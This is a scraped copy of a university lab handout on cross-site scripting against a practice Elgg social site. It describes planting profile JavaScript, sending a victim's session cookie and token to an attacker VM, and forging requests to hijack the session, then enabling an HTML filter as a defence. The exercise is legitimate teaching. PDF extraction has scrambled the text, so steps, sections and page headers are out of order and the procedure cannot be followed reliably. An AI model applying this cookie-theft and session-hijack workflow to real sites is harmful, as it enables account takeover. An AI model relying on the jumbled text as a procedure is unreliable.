Lab14 Cross Site Scripting PDF
| Title | Lab14 Cross Site Scripting |
|---|---|
| Course | Practicum of Attacking and Defense of Network Security |
| Institution | National Taiwan University |
| Pages | 5 |
| File Size | 482.8 KB |
| File Type | |
| Total Downloads | 108 |
| Total Views | 143 |
Summary
123...
Description
Lab14: Cross Site Scripting (XSS) Attacks Due 09:00am, 01/02/2019
1. Learning Goals • • • •
Learn the Cross Site Scripting (XSS) attack and emulate an attacking scenario Learn to use an open source tool (JavaScript and C) to capture cookies and secret information Develop a software tool (in Java) to emulate cookies for the XSS attack Implement countermeasure for the XSS attack
2. Lab Environments This lab has a single host which uses two virtual machines. One VM hosts a web server (apache) and has an emulated social media web site (www.xsslabelgg.com). The hacker, Samy, use JavaScript to capture cookies and session information when the victim (Alice) visits his social web site and sends this information to his attacking machine (VM2). The attacker then uses the cookie and session information to hijack Alice’s web session and grant himself (Samy) to be her friend. When the hacker (Samy) becomes a friend of the victim (Alice), the hacker could access private information of the victim.
3.2 Task 3.2: Software Download (echoserv) Step 1: down the echoserv package to VM2 (attacking machine) wget www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_XSS_Elgg/files/echoserv.tar Step 2: After the download, unpack the package.
Step 3: Compile the source code to get the object code: echoserv which will be used in Task 4.2.
.
3. Lab Preparation 3.1 Task 3.1: JavaScript and Cookie This task is to learn the basics of JavaScript. Step 1: Create an HTML in /var/www/JavaScript
3.3 Task 3.3: Develop a Java Program for the XSS Attack The Java program is provided in Section 3.4 of the SEED lab handout: http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_XSS_Elgg/Web_XSS_Elgg.pdf The template in the handout requires four parameters to be hard coded in the program: elgg_ts, elgg_token, guid, and cookie. The editing of these four parameters will be discussed in Task 4.3. Verify the web page:
12/26/2018' '
The Java program is called HTTPSimpleForge, and the file name of the Java program is HTTPSimpleForge.java
Lab14:'XSS'Attack'
Page'1'of'9'
12/26/2018' '
Lab14:'XSS'Attack'
Page'2'of'9'
The following screenshot shows how to compile and execute a Java program.
profile'icon'
3.4 Task 3.4: Verify the ELGG Web Site The Apache server and the ELGG web site should already in the SEED VirtualBox image. Step 1: Verify the Apache server is up and running.
Step 2: Verify www.XSSLabElgg.com in the /etc/hosts file on VM1 and VM2
VM1' VM2' Step 3: Verify the Root of www.XSSLabElgg.com in /etc/apache2/sites-available/default Step 3: On VM2, login as Alice (user: alice, password: seedalice). Then go to member and select Samy. When visiting Samy’s profile, the JavaScript will be executed and sends an alerting message as shown in the screenshot below.
Step 4: Verify the ELGG web site from both VM1 and VM2
Screenshot-01:'Posting'Message' when'visiting'a'user'profile''
4. Procedure for Cross Site Scripting (XSS) Attack
4.2 Task 4.2: Stealing the Cookie Information
4.1 Task 4.1: Posting a Message This task is to use JavaScript in the form of the profile information. VM1 is used to set the JavaScript which post a message, and VM2 is used to test the setting.
The purpose of Task 4.2 is to steal information for Task 4.3. The procedure is to capture the Cookie and session information on VM1 to VM2 (192.168.56.102) on the TCP port 5555 (hard coded in echoserv). . Step 1: On VM2, start echoserv to capture the cookie information.
Step 1: On VM1, visit the ELGG site and login as Samy (user name: samy, password: seedsamy) Step 2: On VM1, Go to Samy’s profile and then choose edit profile Step 2: On VM1, still login as Samy and edit the profile with the following JavaScript:
12/26/2018' '
Lab14:'XSS'Attack'
Page'3'of'9'
12/26/2018' '
Lab14:'XSS'Attack'
Page'4'of'9'
Note that the screenshot does not capture all the script information.
4.3
Save the data and observe the session information captured on VM2.
Elgg (cookie)
t3r4oc6l1svkb9lgbllrrfr447
elgg_token
dc0fcf8d0391fd9c06245094ea0f3451
elgg_ts
1545202285
gid
39 (Alice)
42 (Samy)
Task 4.3: Hijack the session and Launch the XSS attack
This task is to use the session information to hijack Alice’s session and use it to add Samy as Alice’s friend.
Screenshot-02:'capturing' Cookie'and'GID'of'Samy' Note that gid for Samy is 42.
This attacking scenario is like you visit someone’s social web site (e.g., facebook) and he/she could hijack your session information and add you as his/her friends. After that, the hacker becomes your friend, he/she can access your private information which is available only to friends. Step 1: Modify the Java program (Task 3.3) with the session information of Alice.
Step 3: Edit Samy’s profile again (Brief description) with the following JavaScript
note:'use'the'gid'of'Samy'to' add'Samy'as'a'friend'of'Alice'
Save the change and observe the session information captured in echoserv on VM2.
Step 4: On VM1, change the login from Samy to Alice and verify that Alice has no friends.
Friends'
Step 2: On VM1, start wireshark to capture HTTP traffic (tcp port 80) Step 3: compile and run the Java program.
Step 4: Alice browses the member list and checks Samy’s profile. Step 4: Capture the HTTP traffic from HTTPSimpleForge (forged HTTP packets). It must include HTTP 200 OK.
When Alice visits Samy’s profile, her session information is captured in echoserv on VM2.
Screenshot-03:'Capturing' Session'information'of'Alice'
Note that this session information will be used in the next task to hijack the session.
12/26/2018' '
Lab14:'XSS'Attack'
Page'5'of'9'
12/26/2018' '
Lab14:'XSS'Attack'
Page'6'of'9'
Step 4: in the drop-down list of the filter, select Security and Spam. Step 5: activate HTMLawed 1.8
Screenshot-04:'Execution'of' the'Java'program' Must'show:' 1. timestamp' 2. token' 3. 3.'cookie' 4. HTTP'200'OK' Step 3: Verify that Samy is a friend of Alice.
Screenshot-06:'Activate' HTMLawed'to'protect'XSS'attack' Step 6: On the ELGG web site, login as Alice and then delete Samy’s as her friend.
Screenshot-05:'Verify'Samy'is'a' friend'of'Alice.'
Step 7: Follow the steps in Task 4.2 and Task 4.3, and then run the Java program and check if Samy is Alice’s friend. Step 8: On the ELGG web, login as Samy. Go to his profile and take a screenshot of his brief description. save then exit.
Screenshot-07a:'Brief'description' before'checking.'
Note: if it the attack fails, you may try a new SEED image from scratch. If it still fails, you may simply report the problem and your observation. It is acceptable if the final step of attack fails. The XSS attack is about stealing the information from which hackers may try various attacking scenarios.
4.4 Task 4.4: Countermeasure of XSS Attack
Step 9: go back to Samy’s profile and check his brief description.
Step 1: on the ELGG web site, login as administrator (user: admin, password: seedelgg).
Screenshot-07b:'Brief'description' after'checking.'
Step 2: Go to the administration tab.
Step 3: select the plugins
5.
Lab Report 1.
Your name
2.
Lab Log: Lab Session 1
ID:
Date
Lab Duration (e.g., 1:30)
Comments (problems/accomplishment)
2 3.
12/26/2018' '
Lab14:'XSS'Attack'
Page'7'of'9'
Proof of your lab work a. Screenshot-1: Posting a JavaScript message when visiting a social media site b. Screenshot 2: Capturing the user.gid information of Samy c. Screenshot-3: Capturing Alice’s session information
12/26/2018' '
Lab14:'XSS'Attack'
Page'8'of'9'
Record the session information: Elgg elgg_token elgg_ts gid (Alice) gid (Samy) d. e.
Screenshot-4: Wireshark of HTTP packets from HTTPSimpleForge which show the session information of Alice Screenshot-5: Verification that Samy’s is a friend of Alice Is the attack successful or not?
f.
Screenshot-6: Activation of HTMLawed 1.8 Is the attack successful or not after HTMLLawed is activated?
g.
Screenshot-7: two screenshots showing Brief Description of Samy before and after checking.
4.
Question: After HTMPLawed is activated, we can still launch a successful XSS attack (Step 7 of Task 4.4). Why?
5.
Lab reflection Describe if the lab learning goals are met and also any interesting observation from this lab exercise.
12/26/2018' '
Lab14:'XSS'Attack'
Page'9'of'9'...
Similar Free PDFs
Lab14 Cross Site Scripting
- 5 Pages
Harvardsys - site
- 6 Pages
SITE ANALYSIS
- 36 Pages
Site Synthesis
- 1 Pages
Plan du site - Plan du site
- 2 Pages
Tic tac toe game in bash scripting
- 13 Pages
GSU Rec Site Evaluation
- 4 Pages
Engineering Site Observation Report
- 11 Pages
SIte Investigation (SV-a)
- 28 Pages
Lecture 5 - Site Appraisal
- 3 Pages
Ecological Consideration of Site
- 81 Pages
Ventrogluteal injection site
- 3 Pages
Metode Cross
- 1 Pages
Keynesianns cross
- 26 Pages
Popular Institutions
- Tinajero National High School - Annex
- Politeknik Caltex Riau
- Yokohama City University
- SGT University
- University of Al-Qadisiyah
- Divine Word College of Vigan
- Techniek College Rotterdam
- Universidade de Santiago
- Universiti Teknologi MARA Cawangan Johor Kampus Pasir Gudang
- Poltekkes Kemenkes Yogyakarta
- Baguio City National High School
- Colegio san marcos
- preparatoria uno
- Centro de Bachillerato Tecnológico Industrial y de Servicios No. 107
- Dalian Maritime University
- Quang Trung Secondary School
- Colegio Tecnológico en Informática
- Corporación Regional de Educación Superior
- Grupo CEDVA
- Dar Al Uloom University
- Centro de Estudios Preuniversitarios de la Universidad Nacional de Ingeniería
- 上智大学
- Aakash International School, Nuna Majara
- San Felipe Neri Catholic School
- Kang Chiao International School - New Taipei City
- Misamis Occidental National High School
- Institución Educativa Escuela Normal Juan Ladrilleros
- Kolehiyo ng Pantukan
- Batanes State College
- Instituto Continental
- Sekolah Menengah Kejuruan Kesehatan Kaltara (Tarakan)
- Colegio de La Inmaculada Concepcion - Cebu